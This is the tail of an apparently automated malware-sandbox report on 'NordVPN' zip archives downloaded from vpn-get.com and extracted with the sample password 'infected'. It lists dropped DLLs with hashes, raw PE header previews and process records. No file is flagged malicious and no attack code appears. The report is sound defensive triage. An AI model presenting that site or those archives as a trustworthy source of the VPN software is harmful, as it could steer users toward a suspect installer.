                SHA1:5BB3208D3D2811D7DDDFF7AE4FD9BEB71F8A8472
                SHA-256:31299BAEDEC57D2190B876683F56B49820F62BC61C34414658DDF28734D6F97E
                SHA-512:116A0E02F09113D9656A16601D939FB90F5AB03B54758F5EC7CF4F96AA0FFA3730A5BA0CE67E3E4E8C38B49726176A3B4DF23FC0AAB439E88CD161CD9B2247D0
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................................................`.....*...............`.....`.....`.i.............`.....Rich............PE..d.....s_.........." .....N...V.......S....................................................`..........................................................................................l..T............................l...............`...............................text...nM.......N.................. ..`.rdata..jC...`...D...R..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):45568
                Entropy (8bit):5.858231359538286
                Encrypted:false
                SSDEEP:768:wDqUCO+QSIRYqvceJqiq7z/rO5rHo4NZUkQ/EftxED0WP1:iqZQS1qvjJeLrz4ZUHqPg5P1
                MD5:5B464DBB845244F197C17915C4F2E8EA
                SHA1:98D64023BCB7F5033F8E7ED4130721EEB3289841
                SHA-256:6CF066F862E88F8018A08061CA9559EB942E6143914A7F0FFF750DF2C12896CC
                SHA-512:2F173B990A7EC18EBD7E74BE5C530143A44E692A0A04D5C915543054547FA33DA02CF7FB2255F591AAE0F6978CD944FD413DEAD53F01A4AFD0F8A13ADEAA6CA5
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........rA.!A.!A.!H.$!K.!... E.!... U.!... F.!... @.!c.. C.!.Lp!@.!.. E.!..+!B.!A.!4.!.. E.!.. @.!.H!@.!A. !@.!.. @.!RichA.!........PE..d.....s_.........." .....\...T.......`....................................................`.........................................P..........................d....................{..T...........................@|...............p...............................text....Z.......\.................. ..`.rdata...A...p...B...`..............@..@.data...............................@....pdata..d...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):40960
                Entropy (8bit):5.676630719140105
                Encrypted:false
                SSDEEP:384:L3YIuZKPWWwOXCL7JsusoeUjG7mOUS5JnRAbO9a5y/UKbxHVPM4Yc130rwwzmHVH:jYIwKeWat3jhOUy3PU+WwkqNyT2p
                MD5:1887719113516BDA4EA8F88F50B96234
                SHA1:0133645583F3F5B517E20E672FDD5E506A827C8D
                SHA-256:269DBA44DD14816208848931DFCEB4263E6E8C4C0492607E441C365AB665000E
                SHA-512:BB6F9B47C53BFF70588B81761405F106252A216F3F98C8AA95BE75BCCCBF66CBC1E6CB0D473F0B27D4F572244E6B32AC352BF85BB5F6EDED861775DB5215357B
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L_.j"..j"..j"......j"...#..j"...'..j"...&..j"...!..j"...$..j".&.#..j"...#..j"..j#.;j"...%..j".&.'..j".&."..j".&....j"..j...j".&. ..j".Rich.j".........PE..d...s.s_.........." .....N...P......(U....................................................`.........................................P.......L....................................... n..T............................n...............`...............................text....M.......N.................. ..`.rdata...<...`...>...R..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.630575990216515
                Encrypted:false
                SSDEEP:768:m6eTa8ZV5zru0vyXMpykQwS7kCfmlI/TugbeJ/dMZ:iTNeeCxkpLCfmS/T2NqZ
                MD5:093DA71B48331B1786B39F6BA9032439
                SHA1:5017627C9F08F3C8D03986BDC5163A58E296FC46
                SHA-256:8BA07861C4CEB06210CF181C1F523E81F44405772AB1A1DC423BCB40F3A50983
                SHA-512:FF168537AB847A196FAB501F82C3707D245F83C7436FE1CA984F10FA3FFD9B5FD9B743D0B145CC1D4DD79F71F565A960A9249A11035BF216485A9C5BB67F612B
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......$U..`4.`4.`4.iLF.d4.2\.d4.2\.s4.2\.g4.2\.a4.BT.d4..].d4..fI.c4.`4..4..].c4..].a4..]*.a4.`4B.a4..].a4.Rich`4.........................PE..d.....s_.........." .....N...J.......S....................................................`.........................................Pz..,...|........................................i..T...........................@j...............`...............................text....L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...h...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):45568
                Entropy (8bit):5.793348426727689
                Encrypted:false
                SSDEEP:768:WluAyGXOMYy0kwdRrrN0T3uiSRUSE6l14eEZg:PAyGXOdy0kwdATmRU7w1Sg
                MD5:DCEF8994E6BF5230C62F01C48753DBAF
                SHA1:081698122A23D261AAB1C9BE973EF9A9AA63539E
                SHA-256:80C2236AB7AC3DAB6677EFB63ADA6E25544507933F869BEF0DEA4BC242BA819F
                SHA-512:859EEAA3488AA665D889E306B3B0913CA12306CC53790BA0553587BCF6C16F32D7D5B14493241A6477C02D46F01B8D02FD5ED1F6CCAFF1129228B435D353C47F
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.U<..;o..;o..;ov.ow.;o-.:n{.;o-.>nk.;o-.?nx.;o-.8n~.;o].:n}.;od'.o}.;o..:nz.;o..:o..;o..>n|.;o..;n~.;o...o~.;o...o~.;o..9n~.;oRich..;o................PE..d...O.s_.........." .....D...l......8I....................................................`.................................................p...................\...................p...T...........................................`..X............................text....C.......D.................. ..`.rdata..jY...`...Z...H..............@..@.data...X...........................@....pdata..\...........................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.703620844148914
                Encrypted:false
                SSDEEP:768:rm2CGmWkgA3KNCV5oXYHvaDu/hoSG66GfqYNRhuTHvna6/J8kfr:rmemR0XYHvaq/hoSH6GfqYNRhuTHvRm8
                MD5:F2CD74A1B3582B1B318D46ADFC19CB6B
                SHA1:D1FCC9909CEBFFF96125EBACF4932AC90E448126
                SHA-256:12BD68CA5F1CC46D4861B77DA3BAEB5BA45A7A4E86E891AC372BCF8E182E757B
                SHA-512:D78E989DF7C9007CEEE00D1F3BFF61BF04A48C3D658A0D50F4BA832F35E9F86E5A6C19440955453402DE5F1EA174716214DC900CF76A9BE5AFCA10B9C9686199
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+......................................._.............._......._......._.G......./....._.......Rich............PE..d...D.s_.........." .....L...L.......Q....................................................`.............................................X...h........................................n..T...........................pn...............`...............................text....K.......L.................. ..`.rdata...:...`...<...P..............@..@.data...x...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):4691608
                Entropy (8bit):6.765525525116327
                Encrypted:false
                SSDEEP:49152:kxvv6zzXjo5ssBNM8kJ64j06ZlhmQkmzxlxixkRCtaCFqdu2qduSuVqpy9uVqpyV:k56zzXjo5ssBNM8kJ60087osjSbyv0
                MD5:8EE3EF186A0D17275AC3AE664236BF34
                SHA1:27A0AF02857C2E3920FE7E46DCCB747B0B4759BD
                SHA-256:717FB849F88DA5D76EDA13A5350BBCC77F14F472DFC5E6CD855A757605A6C651
                SHA-512:FD6D90102E24BD43E07C99105E0B1B050F8AC614EA1D653ACA4D9354EF3B0A8D7C63C6D5C379F6C07D278560EE0FA47FB829F516BF1579FE5FA29F86A9AE6E0E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........4.eZ..eZ..eZ...'.5dZ..eZ.xgZ..i...eZ.#*..eZ.....eZ.....eZ.....eZ.....eZ...!..eZ..e[.<dZ.....dZ.....eZ..7..eZ.....eZ.Rich.eZ.........................PE..L...Kk.V.........."!....."5..:......!. ......@5....,..........................G.......H...............................B.X.....B.......C.d............`G..6....C.\.....5............................. .?.@............@5.x............................text....!5......"5................. ..`.rdata..8....@5......&5.............@..@.data.........B.......B.............@....rsrc...d.....C......nC.............@..@.reloc........C.......C.............@..B........................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):45056
                Entropy (8bit):5.466591180388901
                Encrypted:false
                SSDEEP:768:bKSldNwNu2rofQpdZ+6O1GC8DpEt7c5aMyU6/JQd/os0it26Wy1j7nyyyEMpyYya:bpNjuofQpi6OB8DpEt7c5aMyU6/JQd/C
                MD5:FF69429C947D58C88CAB91854351E0F5
                SHA1:AFA2BA365C6AD716444532642001007483326A96
                SHA-256:33A79BDBAEE97491911CC90F0906DEC084E64627B0D890377112ED3DAFA226CA
                SHA-512:B64C405E905BB11C786164FDBFDBA354D3C79F6DA1CBF5028656688CE0B6A10BE360CAEA2B754F297062AD1114EB1010DFFCED505E7E66C08E503224A6A453C3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........J.O.$.O.$.O.$.F..I.$...%.K.$...!.[.$... .H.$...'.M.$.m.%.K.$...%.L.$.O.%.$.$...!.L.$...$.N.$.....N.$.O...N.$...&.N.$.RichO.$.........PE..d.....s_.........." .....L...b.......R....................................................`.........................................@............................................... ~..T............................~...............`..P............................text...~K.......L.................. ..`.rdata...P...`...R...P..............@..@.data...X...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):40448
                Entropy (8bit):5.524447114499072
                Encrypted:false
                SSDEEP:768:XWOWTtnfVml3fNsMV9ugmAglM+efX9stlxJIaU:XwtfVq3KK9lmAgl4XUj+aU
                MD5:18B712E99BB45D3D535CE800AC1F7294
                SHA1:BB03E7BE212B3A9BBD6F0303C43628D7F5AF77A5
                SHA-256:7147DDCBCC2F4B059B21CC9ADFC9670A7374EB4A230FDF09D1D0FFC4BFA954AC
                SHA-512:44A4D7B2997D076713F47411093E8577C9F88B4EA2494B1694A3EF05B33CD6CF69D7A571103EF5B38A6CBB47D522B34466C05634373E898F59D2EDE256739E48
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../..N...N...N...6...N...&...N...&...N...&...N...&...N.......N..`'...N...N...N..`'...N..`'...N..`'...N...N...N..`'...N..Rich.N..........................PE..d...#.s_.........." .....N...N.......R....................................................`.........................................P...h............................................m..T............................n...............`...............................text....M.......N.................. ..`.rdata..2;...`...<...R..............@..@.data...h...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.601024353373893
                Encrypted:false
                SSDEEP:384:F3bhoX7/rGXONHMbC+KIs6iW+xUVVjdb5PtPZyGHwyj6bGsDbxHK+xzkdtORuIWF:ArieN0C+kxUJ5JIZB34J19woY3sL
                MD5:D39AAF3DFDB356EC1B0D693971FEB8EA
                SHA1:09CA52010706B9555BD8C58EBE861A96376D9B91
                SHA-256:AA7CE116903605F686652750445DB30DFD9E628A77E2F03D83857351565A3088
                SHA-512:1084D1481A6CF7A307F8D072D019D80816C475820135BA310D1F3504189C41F9D1D7ED705212B1DD5438729F9CA0B5303170B1A1B16946C3AA580A541208EC0C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........)].GH3.GH3.GH3.N0..OH3.. 2.CH3.. 6.]H3.. 7.OH3.. 0.DH3.e(5.FH3.e(2.AH3..!2.DH3.GH2.-H3..!6.DH3..!3.FH3..!..FH3.GH..FH3..!1.FH3.RichGH3.........................PE..d...e.s_.........." .....J...R......PH....................................................`.........................................................................................0l..T............................l...............`...............................text....H.......J.................. ..`.rdata..x9...`...:...N..............@..@.data...x...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                No static file info
                No network behavior found

                Click to jump to process

                Target ID:0
                Start time:00:07:20
                Start date:30/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                Imagebase:0x7ff683680000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:1
                Start time:00:07:21
                Start date:30/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff683680000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:2
                Start time:00:07:22
                Start date:30/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vpn-get.com/nordvpn
                Imagebase:0x7ff683680000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:5
                Start time:00:08:24
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\unarchiver.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip
                Imagebase:0x7b0000
                File size:12800 bytes
                MD5 hash:B89F9ADB5A6E465B6EB4575913CD2687
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:low

                Target ID:6
                Start time:00:08:27
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\7za.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
                Imagebase:0x1390000
                File size:289792 bytes
                MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:7
                Start time:00:08:27
                Start date:30/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:8
                Start time:00:09:09
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\unarchiver.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip
                Imagebase:0x9c0000
                File size:12800 bytes
                MD5 hash:B89F9ADB5A6E465B6EB4575913CD2687
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:low

                Target ID:9
                Start time:00:09:12
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\7za.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
                Imagebase:0x1390000
                File size:289792 bytes
                MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:10
                Start time:00:09:12
                Start date:30/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                No disassembly